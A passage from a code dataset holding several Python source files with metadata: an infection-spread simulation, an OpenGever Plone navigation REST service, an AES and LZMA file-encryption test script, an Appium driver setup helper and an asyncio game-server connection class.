infected_pop = [p for p in self.population if p.get_status() == 1]\n recovered_pop = [p.set_immune(current_time_o) for p in infected_pop if\n current_time_o - p.get_time_infected() > timedelta(days=self.time_to_recover)]\n infected_pop = set(infected_pop).difference(recovered_pop) # infected pop - recovered\n # print (len(infected_pop))\n # print (len(recovered_pop))\n # print (len(self.population))\n # print ('----')\n\n # calculate number of infected people\n total_infected = len(infected_pop)\n # if total_infected == 0:\n # \t#if there is no infected person at place, no one else can be infected (ie do not execute code below)\n # \treturn\n\n total_pop = len(self.population)\n\n # calculate susceptible to infection\n susceptible_pop = self.population.difference(infected_pop)\n susceptible_pop = susceptible_pop.difference(self.immune_population)\n self.immune_population = self.immune_population.union(recovered_pop)\n\n # calculate probability of infection\n if total_pop == 0:\n prob_infection = 0.0\n else:\n prob_infection = total_infected / total_pop\n\n # calculate newly infected number\n newly_infected_num = int(len(susceptible_pop) * prob_infection)\n\n # set newly infected persons accordingly\n newly_infected_pop = random.choices(tuple(susceptible_pop), k=newly_infected_num)\n for i in range(newly_infected_num):\n newly_infected_pop[i].set_infected(current_time_o)\n\n # count number infected\n self.total_infected_number = len(infected_pop) + newly_infected_num\n\n def set_recovered(self):\n ''' Process local population and yield a new cycle of recoveries (death case will be added later)'''\n pass\n", "sub_path": "Place.py", "file_name": "Place.py", "file_ext": "py", "file_size_in_byte": 3342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "Person.Person", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 50, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 80, "usage_type": "call"}]}
+{"seq_id": "541244773", "text": "from Acquisition import aq_parent\nfrom ftw.solr.interfaces import ISolrSearch\nfrom ftw.solr.query import make_filters\nfrom opengever.base.browser.navigation import make_tree_by_url\nfrom opengever.base.interfaces import IOpengeverBaseLayer\nfrom opengever.base.solr import OGSolrDocument\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryfolder import REPOSITORY_FOLDER_STATE_INACTIVE\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.contentlisting.interfaces import IContentListingObject\nfrom plone.restapi.interfaces import IExpandableElement\nfrom plone.restapi.serializer.converters import json_compatible\nfrom plone.restapi.services import Service\nfrom Products.CMFPlone.interfaces.siteroot import IPloneSiteRoot\nfrom zExceptions import BadRequest\nfrom zope.component import adapter\nfrom zope.component import getUtility\nfrom zope.dottedname.resolve import resolve\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\n\n@implementer(IExpandableElement)\n@adapter(Interface, IOpengeverBaseLayer)\nclass Navigation(object):\n\n FIELDS = [\n 'UID',\n 'path',\n 'portal_type',\n 'review_state',\n 'Title',\n 'title_de',\n 'title_en',\n 'title_fr',\n 'Description',\n 'filename',\n 'has_sametype_children',\n 'is_subdossier',\n 'dossier_type',\n ]\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.solr = getUtility(ISolrSearch)\n\n def __call__(self, expand=False):\n root_interface = self.get_root_interface()\n content_interfaces = self.get_content_interfaces()\n\n if self.request.form.get('include_root'):\n content_interfaces.append(root_interface)\n\n result = {\n 'navigation': {\n '@id': '{}/@navigation'.format(self.context.absolute_url()),\n },\n }\n\n if not expand:\n return result\n\n root = self.find_root(root_interface, content_interfaces)\n solr_docs = self.query_solr(root, content_interfaces)\n\n nodes = map(self.solr_doc_to_node, solr_docs)\n result['navigation']['tree'] = make_tree_by_url(nodes)\n\n return result\n\n def find_root(self, root_interface, content_interfaces):\n context = self.context\n\n if root_interface not in content_interfaces:\n while (not root_interface.providedBy(context)\n and not IPloneSiteRoot.providedBy(context)):\n context = aq_parent(context)\n else:\n # This happens i.e. on lookup a dossier tree from a subdossier.\n #\n # The current context is the subdossier which is also\n # providing the root_interface. We have to get sure, that we return\n # the most upper object providing the given root_interface if\n # the root_interface is within `content_interfaces`\n current = context\n while (not IPloneSiteRoot.providedBy(current)):\n if root_interface.providedBy(current):\n context = current\n current = aq_parent(current)\n\n if root_interface.providedBy(context):\n root = context\n else:\n response = self.solr.search(\n filters=make_filters(\n object_provides=root_interface.__identifier__),\n sort='path asc',\n fl=[\"path\"],\n )\n roots = [OGSolrDocument(d) for d in response.docs]\n\n if roots:\n root = roots[0].getObject()\n else:\n raise BadRequest(\"No root found for interface: {}\".format(\n root_interface.__identifier__))\n return root\n\n def query_solr(self, root, content_interfaces):\n query = {\n 'object_provides': [i.__identifier__ for i in content_interfaces],\n 'path_parent': '/'.join(root.getPhysicalPath()),\n 'trashed': 'false',\n }\n\n review_states = self.request.form.get('review_state', [])\n if review_states:\n query['review_state'] = review_states\n\n filters = make_filters(**query)\n\n if self.request.form.get('include_context'):\n # Include context branch's UIDs in the query, by adding them as\n # a filter that is OR'ed with the main filters (which themselves\n # are AND'ed together). This is necessary because restrictions\n # from the main filters must not be applied to the context branch.\n context_uids = list(self.get_context_branch_uids(root))\n if context_uids:\n context_filter = make_filters(UID=context_uids)[0]\n main_filters = self._join_filters(make_filters(**query), 'AND')\n filters = self._join_filters([main_filters, context_filter], 'OR')\n\n resp = self.solr.search(\n filters=filters,\n sort='sortable_title asc',\n rows=10000,\n fl=self.FIELDS)\n\n return [OGSolrDocument(doc) for doc in resp.docs]\n\n def get_context_branch_uids(self, root):\n \"\"\"Return UIDs of the current context's chain up to the root.\n \"\"\"\n for item in self.context.aq_chain:\n item_uid = item.UID()\n if item_uid == root.UID():\n break\n yield item_uid\n\n def _lookup_iface_by_identifier(self, identifier):\n return resolve(identifier) if identifier else None\n\n def _join_filters(self, filters, op):\n op = ' %s ' % op\n return op.join(['(%s)' % flt for flt in filters])\n\n def get_root_interface(self):\n \"\"\"Lookups the root_interface provided within the request parameter.\n\n This interface is used as the navigation root identifier.\n \"\"\"\n interface = self.request.form.get('root_interface')\n try:\n return self._lookup_iface_by_identifier(\n interface) or IRepositoryRoot\n except ImportError:\n raise BadRequest(\"The provided `root_interface` could not be \"\n \"looked up: {}\".format(interface))\n\n def get_content_interfaces(self):\n \"\"\"Lookups the content_interfaces provided within the request parameter.\n\n The interfaces provided in `content_interfaces` are used as navigation\n items.\n \"\"\"\n interfaces = self.request.form.get('content_interfaces')\n if not interfaces:\n return [IRepositoryFolder]\n\n if not isinstance(interfaces, list):\n interfaces = [interfaces]\n\n content_interfaces = []\n for interface in interfaces:\n try:\n content_interfaces.append(\n self._lookup_iface_by_identifier(interface))\n except ImportError:\n raise BadRequest(\"The provided `content_interfaces` could not be \"\n \"looked up: {}\".format(interface))\n return content_interfaces\n\n def solr_doc_to_node(self, solr_doc):\n wrapper = IContentListingObject(solr_doc)\n context_url = self.context.absolute_url()\n\n node = {\n '@type': wrapper.portal_type,\n 'text': wrapper.Title(),\n 'description': wrapper.Description(),\n 'url': wrapper.getURL(),\n 'uid': wrapper.UID,\n 'active': wrapper.review_state() != REPOSITORY_FOLDER_STATE_INACTIVE,\n 'current': context_url == wrapper.getURL(),\n 'current_tree': context_url.startswith(wrapper.getURL()),\n 'is_leafnode': None,\n 'is_subdossier': wrapper.is_subdossier,\n 'review_state': wrapper.review_state(),\n 'dossier_type': wrapper.dossier_type,\n }\n if wrapper.portal_type == 'opengever.repository.repositoryfolder':\n node['is_leafnode'] = not wrapper.has_sametype_children\n return json_compatible(node)\n\n\nclass NavigationGet(Service):\n\n def reply(self):\n navigation = Navigation(self.context, self.request)\n return navigation(expand=True)['navigation']\n", "sub_path": "opengever/api/navigation.py", "file_name": "navigation.py", "file_ext": "py", "file_size_in_byte": 8202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "zope.component.getUtility", "line_number": 46, "usage_type": "call"}, {"api_name": "ftw.solr.interfaces.ISolrSearch", "line_number": 46, "usage_type": "argument"}, {"api_name": "opengever.base.browser.navigation.make_tree_by_url", "line_number": 68, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 77, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 77, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 78, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot.providedBy", "line_number": 87, "usage_type": "call"}, {"api_name": "Products.CMFPlone.interfaces.siteroot.IPloneSiteRoot", "line_number": 87, "usage_type": "name"}, {"api_name": "Acquisition.aq_parent", "line_number": 90, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 96, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 101, "usage_type": "call"}, {"api_name": "zExceptions.BadRequest", "line_number": 106, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 121, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 130, "usage_type": "call"}, {"api_name": "ftw.solr.query.make_filters", "line_number": 131, "usage_type": "call"}, {"api_name": "opengever.base.solr.OGSolrDocument", "line_number": 140, "usage_type": "call"}, {"api_name": "zope.dottedname.resolve.resolve", "line_number": 152, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryroot.IRepositoryRoot", "line_number": 166, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 168, "usage_type": "call"}, {"api_name": "opengever.repository.interfaces.IRepositoryFolder", "line_number": 179, "usage_type": "name"}, {"api_name": "zExceptions.BadRequest", "line_number": 190, "usage_type": "call"}, {"api_name": "plone.app.contentlisting.interfaces.IContentListingObject", "line_number": 195, "usage_type": "call"}, {"api_name": "opengever.repository.repositoryfolder.REPOSITORY_FOLDER_STATE_INACTIVE", "line_number": 204, "usage_type": "name"}, {"api_name": "plone.restapi.serializer.converters.json_compatible", "line_number": 214, "usage_type": "call"}, {"api_name": "zope.interface.implementer", "line_number": 23, "usage_type": "call"}, {"api_name": "plone.restapi.interfaces.IExpandableElement", "line_number": 23, "usage_type": "argument"}, {"api_name": "zope.component.adapter", "line_number": 24, "usage_type": "call"}, {"api_name": "zope.interface.Interface", "line_number": 24, "usage_type": "argument"}, {"api_name": "opengever.base.interfaces.IOpengeverBaseLayer", "line_number": 24, "usage_type": "argument"}, {"api_name": "plone.restapi.services.Service", "line_number": 217, "usage_type": "name"}]}
+{"seq_id": "412269518", "text": "# -*- coding: utf-8 -*-\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\nfrom Crypto.Hash import SHA256\nimport pylzma\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('./encrepo'))\nimport hash_helper\nimport pack\nimport time\n\nBS = 32\nAES_KEY_SIZE = 32 #Key is 256 bit\npad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s + (AES_KEY_SIZE - len(s) % AES_KEY_SIZE) \\\n * chr(AES_KEY_SIZE - len(s) % AES_KEY_SIZE)\n\nunpad = lambda s : s if len(s) % AES_KEY_SIZE == 0 else \\\n s[:-ord(s[len(s)-1])]\n\nclass AESCipher:\n def __init__( self, key ):\n self.key = key\n\n def encrypt( self, raw ):\n raw = pad(raw)\n iv = Random.new().read( AES.block_size )\n cipher = AES.new( self.key, AES.MODE_CBC, iv )\n return base64.b64encode( iv + cipher.encrypt( raw ) )\n\n def decrypt( self, enc ):\n enc = base64.b64decode(enc)\n iv = enc[:16]\n cipher = AES.new(self.key, AES.MODE_CBC, iv )\n return unpad(cipher.decrypt( enc[16:] ))\n\nraw_info = \"\"\"awsome text goes here,\n U cannot see me,\n One good turn deserves another\"\"\"\n\nwith open('/home/xin/iprule') as input_file:\n raw_info = input_file.read()\n\nkey = 'abcdefghijklmnopqrstuvwxyz123456'\n\n\nkey = pad(key)\n\nAES_KEY = 'asdfas2\"%H:%M:%'\n\ndef test_compressed():\n print(\"key=%s length:%d\"%(key,len(key)))\n print(\"Original length of data:%d\"%len(raw_info))\n\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n h = SHA256.new()\n h.update(raw_info)\n print(\"Original hashA:%s\"%h.hexdigest())\n\n\n compressed_info = pylzma.compress(raw_info)\n\n print(\"compressed length of data:%d\"%len(compressed_info))\n\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(compressed_info)\n decrypted = cf.decrypt(encrypted)\n print(\"encrypted length of data:%d\"%len(encrypted))\n decompressed = pylzma.decompress(decrypted)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decompressed))\n\n\n\n\ndef test_run1():\n print(\"Original length of data:%d\"%len(raw_info))\n raw_hash = hash_helper.hash_str(raw_info)\n print(\"Original hash:%s\"%raw_hash)\n\n cf = AESCipher(key)\n encrypted = cf.encrypt(raw_info)\n print(\"length of encrypted data:%d\"%len(encrypted))\n compressed_info = pylzma.compress(encrypted)\n print(\"compressed length of encrypted data:%d\"%len(compressed_info))\n\n decompressed = pylzma.decompress(compressed_info)\n decrypted = cf.decrypt(decompressed)\n print(\"Decrypted hash:%s\"%hash_helper.hash_str(decrypted))\n\n\ndef test_run2():\n info = \"the red fox jumps over the lazy dog\\n\"\n more_info = lambda i : '' if i ==0 else \\\n more_info(i-1) + 'Line {0:10d} : {1}'.format(i, info) * 100\n with open('/tmp/test.txt','w') as afile:\n afile.write(more_info(100))\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n print('{0}:....total={1:20f}, step={2:20f}'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\ndef noautorun_test_pack_large():\n t0 = time.time()\n print(t0)\n t1 = t0\n t2 = t1\n\n print('{0}:....total={1:12f}, step={2:12f}..starting'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n\n #test_file = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n test_file = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n with open(test_file) as afile:\n dgst_original = hash_helper.hash_file(afile)\n #dgst_original ='370cbba5943b5ba6ab868e9f0e098d8ccb8aa5f7396f82ebe22ac6a072c001f8'\n print(\"Original SHA256:%s\"%dgst_original)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst original'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n packed_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4.pack'\n unpacked_file_name = '/tmp/Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.unpack.mp4'\n pack.pack_file(AES_KEY, test_file, packed_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..packing..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n pack.unpack_file(AES_KEY, packed_file_name, unpacked_file_name)\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..Unpacking..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n with open(unpacked_file_name) as newfile:\n dgst_new = hash_helper.hash_file(newfile)\n\n\n t2 = time.time()\n print('{0}:....total={1:12f}, step={2:12f}..dgst result..'.format(\n time.strftime(\"%H:%M:%S\", time.localtime(t0)),\n t2 - t0,\n t2 - t1))\n t1 = t2\n print(\"New SHA256:%s\"%dgst_new)\n assert dgst_original == dgst_new\n\ndef noautorun_test_pad():\n with open('/tmp/3.mp4') as afile:\n s = afile.read()\n print(hash_helper.hash_str(s))\n encrypted = pack.encrypt(AES_KEY, s)\n decrypted = pack.decrypt1(AES_KEY, encrypted)\n print(hash_helper.hash_str(decrypted))\n print(unpad(hash_helper.hash_str(decrypted)))\n\ndef split_file_writer(file_name, split_size=32):\n file_size = split_size * 2 ** 20\n sum_len = [0]\n def write_file(buf):\n sum_len[0] += len(buf)\n file_no = sum_len[0] // file_size\n new_filename = file_name if file_no==0 else file_name+'.'+('0000'+str(file_no))[-4:]\n with open(new_filename,'a') as afile:\n afile.write(buf)\n return write_file\n\n\ndef split_file_reader(file_name):\n files = [open(file_name,'r')]\n file_no = [0]\n def read_file(buf_size):\n buf = files[0].read(buf_size)\n if len(buf) == 0:\n file_no[0] += 1\n files[0].close()\n try:\n files[0] = open(file_name+'.'+('0000'+str(file_no[0]))[-4:])\n return read_file(buf_size)\n except IOError:\n return ''\n else:\n return buf\n return read_file\n\ndef tester_split():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n writer = split_file_writer(splited_file_name)\n\n with open(original_file_name) as afile:\n buf = afile.read(65536)\n while len(buf) >0 :\n writer(buf)\n buf = afile.read(65536)\n\ndef tester_combine():\n original_file_name = '/home/xin/下载/头脑特工队.Inside.Out.2015.BD1080P.X264.AAC.English&Mandarin.CHS-ENG.Mp4Ba.mp4'\n splited_file_name = '/tmp/new/inside.out.mp4'\n recombined_file_name = '/tmp/inside.out.recombined.mp4'\n reader = split_file_reader(splited_file_name)\n with open(recombined_file_name,'w') as afile:\n buf = reader(65536)\n while len(buf)>0:\n afile.write(buf)\n buf = reader(65536)\n\n dgst1 = hash_helper.hash_file(open(original_file_name))\n dgst2 = hash_helper.hash_file(open(recombined_file_name))\n\n assert dgst1 == dgst2\n\n\ntester_combine()\n", "sub_path": "encrypted_file_repo/test/test_run.py", "file_name": "test_run.py", "file_ext": "py", "file_size_in_byte": 7461, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.insert", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "Crypto.Random.new", "line_number": 30, "usage_type": "call"}, {"api_name": "Crypto.Random", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.block_size", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES", "line_number": 30, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 31, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 31, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 32, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 35, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 37, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 37, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 37, "usage_type": "attribute"}, {"api_name": "hash_helper.hash_str", "line_number": 58, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256.new", "line_number": 60, "usage_type": "call"}, {"api_name": "Crypto.Hash.SHA256", "line_number": 60, "usage_type": "name"}, {"api_name": "pylzma.compress", "line_number": 65, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 74, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 75, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 82, "usage_type": "call"}, {"api_name": "pylzma.compress", "line_number": 88, "usage_type": "call"}, {"api_name": "pylzma.decompress", "line_number": 91, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 93, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 118, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 118, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 125, "usage_type": "call"}, {"api_name": "time.time", "line_number": 128, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 130, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 130, "usage_type": "call"}, {"api_name": "pack.pack_file", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 137, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 139, "usage_type": "call"}, {"api_name": "pack.unpack_file", "line_number": 143, "usage_type": "call"}, {"api_name": "time.time", "line_number": 144, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 146, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 146, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 156, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 156, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 166, "usage_type": "call"}, {"api_name": "pack.encrypt", "line_number": 167, "usage_type": "call"}, {"api_name": "pack.decrypt1", "line_number": 168, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 169, "usage_type": "call"}, {"api_name": "hash_helper.hash_str", "line_number": 170, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 224, "usage_type": "call"}, {"api_name": "hash_helper.hash_file", "line_number": 225, "usage_type": "call"}]}
+{"seq_id": "340990095", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom commons import logger\nimport os\n\nimport yaml\nfrom appium import webdriver\n\nlogger = logger.Logger().getLogger()\n\n\ndef appium_desired():\n dirname = os.path.dirname(os.path.dirname(__file__))\n filename = os.path.join(dirname, 'config/kyb_caps.yaml')\n with open(filename, 'r', encoding='utf-8') as file:\n data = yaml.load(file)\n\n base_dir = os.path.dirname(os.path.dirname(__file__))\n app_path = os.path.join(base_dir, 'app', data['appname'])\n desired_caps = {\n \"platformName\": data['platformName'],\n \"platformVersion\": data['platformVersion'],\n\n \"deviceName\": data['deviceName'],\n \"udid\": data['udid'],\n\n \"app\": app_path,\n \"appPackage\": data['appPackage'],\n \"appActivity\": data['appActivity'],\n\n \"automationName\": data['automationName'],\n \"noReset\": data['noReset'],\n\n \"unicodeKeyboard\": data['unicodeKeyboard'],\n \"resetKeyboard\": data['resetKeyboard']\n }\n logger.info('start app......')\n\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(3)\n return driver\n\n\nif __name__ == '__main__':\n appium_desired()\n", "sub_path": "commons/desired_caps.py", "file_name": "desired_caps.py", "file_ext": "py", "file_size_in_byte": 1255, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "commons.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "commons.logger.Logger", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "commons.logger.info", "line_number": 37, "usage_type": "call"}, {"api_name": "commons.logger", "line_number": 37, "usage_type": "name"}, {"api_name": "appium.webdriver.Remote", "line_number": 39, "usage_type": "call"}, {"api_name": "appium.webdriver", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "200320471", "text": "#!/usr/bin/python3\n\nimport spaceking.net as net\nimport spaceking.common as com\nimport spaceking.log as log\nimport spaceking.event as ev\n\nimport shutil\nimport atexit\nimport os\nimport tempfile\nimport asyncio\nimport socket\n\nEVT_SERVER_RUNNING = 15000\nEVT_SERVER_QUIT = 15001\nEVT_SERVER_CONNECTED = 15002\nEVT_SERVER_DISCONNECTED = 15003\nEVT_SERVER_FAILED_JOIN = 15004\nEVT_SERVER_FAILED_CLIENT = 15005\nEVT_SERVER_NEW_CLIENT = 15006\nEVT_SERVER_DISCONNECTED_CLIENT = 15007\n\n\nclass ServerClient:\n\n __slots__ = [\"uid\", \"addr\", \"reader\", \"writer\"]\n\n def __init__(self, uid, addr, reader, writer):\n self.uid = uid\n self.addr = addr\n self.reader = reader\n self.writer = writer\n\n def __str__(self):\n return \"client: uid={0}, addr={1}\".format(self.uid, self.addr)\n\n\nclass ServerConnection(net.Connection):\n \"\"\"Game server\"\"\"\n\n MAX_CLIENTS = 16\n\n def __init__(self,\n bind_to=None,\n loop=asyncio.get_event_loop(),\n socket_type=\"tcp\"):\n \"\"\"NOTE: with socket_type = unix, the bind_to needs to be None or a\n temporary directory. This directory is removed on exit.\"\"\"\n super().__init__()\n self.clients = []\n self.server = None\n self._uid_cursor = 0 # ringbuf cur.\n self.loop = loop\n\n self.proto_map = {\n \"tcp\": self._start_tcp_server,\n \"unix\": self._start_unix_server\n }\n if socket_type not in self.proto_map:\n raise ValueError(\"socket type: {0} not valid.\".format(socket_type))\n self.socket_type = socket_type\n\n if bind_to is None:\n if socket_type == \"unix\":\n self.bind_to = self._unique_unix_socket_path()\n else:\n self.bind_to = \"localhost\"\n else:\n self.bind_to = bind_to\n\n self.register_handler(net.EVT_PACKET_SEND, self.handle_packet_send)\n\n def _unique_unix_socket_path(self):\n directory = tempfile.mkdtemp(prefix=\"sock-serv\", dir=com.CONFIG_HOME)\n sock_name = \"socket\"\n return os.path.join(directory, \"socket\")\n\n def _create_client(self, uid, *args, **kwargs):\n client = ServerClient(uid, *args, **kwargs)\n self._add_client(client)\n\n def create_evt(pkt):\n return net.NetEvent(net.EVT_PACKET_RECV, uid, pkt)\n\n # Server listens for client packets\n coro = self.listen_packets(client.reader, create_evt)\n task = asyncio.Task(coro, loop=self.loop)\n # Cleanup on socket death\n task.add_done_callback(lambda t: self.disconnect_client(client, t))\n return client\n\n def _add_client(self, client):\n self.clients.append(client)\n\n def _remove_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if idx == uid:\n del self.clients[idx]\n\n def _get_client_by_uid(self, uid):\n for idx, client in enumerate(self.clients):\n if client.uid == uid:\n return self.clients[idx]\n\n def _next_uid(self):\n # Spawn new unique client ID. ring used for simplicity.\n uid = self._uid_cursor\n self._uid_cursor = (uid + 1) % ServerConnection.MAX_CLIENTS\n return uid\n\n def get_client_count(self):\n return len(self.clients)\n\n @asyncio.coroutine\n def accept_client(self, reader, writer):\n uid = self._next_uid()\n\n remote_addr = self._get_addr(writer)\n if remote_addr is None:\n log.warn(\"Error on client uid={0} connect.\".format(uid))\n return\n\n client = self._create_client(uid, remote_addr, reader, writer)\n\n yield from self.notify(net.NetEvent(EVT_SERVER_NEW_CLIENT, uid))\n log.info(\"{0} connected.\".format(client))\n\n @asyncio.coroutine\n def handle_packet_send(self, event):\n client = self._get_client_by_uid(event.uid)\n if client is None:\n return\n try:\n yield from self.send_packets(client.writer, event.pkt)\n except socket.error as err:\n log.debug(\"Error while sending packets to {0}\".format(client))\n self.disconnect_client(client)\n return\n\n def disconnect_client_by_uid(self, uid):\n # task of disconnect notification is returned\n self._remove_client_by_uid(uid)\n event = net.NetEvent(EVT_SERVER_DISCONNECTED_CLIENT, uid)\n\n task = asyncio.Task(self.notify(event), loop=self.loop)\n return task\n\n def disconnect_client(self, client, client_task=None):\n if client_task:\n try:\n result = client_task.result()\n except Exception as err:\n msg = \"{0} completed with an error. {1}\".format(client, err)\n log.debug(msg)\n\n log.info(\"{0} disconnected.\".format(client))\n self.disconnect_client_by_uid(client.uid)\n\n def _start_server(self, coro):\n try:\n self.server = self.loop.run_until_complete(coro)\n except Exception as err:\n log.error(\"server connection crashed on startup\")\n raise err\n\n def _start_tcp_server(self):\n self._start_server(asyncio.start_server(self.accept_client,\n loop=self.loop,\n host=self.bind_to,\n port=net.SERVER_PORT,\n reuse_address=True))\n\n def _start_unix_server(self):\n def socket_cleanup():\n shutil.rmtree(os.path.dirname(self.bind_to))\n log.debug(\"UNIX socket {0} cleaned up.\".format(self.bind_to))\n\n atexit.register(socket_cleanup)\n self._start_server(asyncio.start_unix_server(self.accept_client,\n path=self.bind_to,\n loop=self.loop))\n\n def start_server(self):\n self.proto_map[self.socket_type]()\n\n log.info(\"spaceking server listening.\")\n self.notify(net.NetEvent(EVT_SERVER_RUNNING, None))\n\n def quit(self):\n log.debug(\"spaceking server connection shutting down.\")\n if self.server:\n self.server.close()\n self.server = None\n self.notify(net.NetEvent(EVT_SERVER_QUIT, None))\n else:\n log.debug(\"Calling quit on a dead server\")\n", "sub_path": "spaceking/server/net.py", "file_name": "net.py", "file_ext": "py", "file_size_in_byte": 6412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "spaceking.net.Connection", "line_number": 39, "usage_type": "attribute"}, {"api_name": "spaceking.net", "line_number": 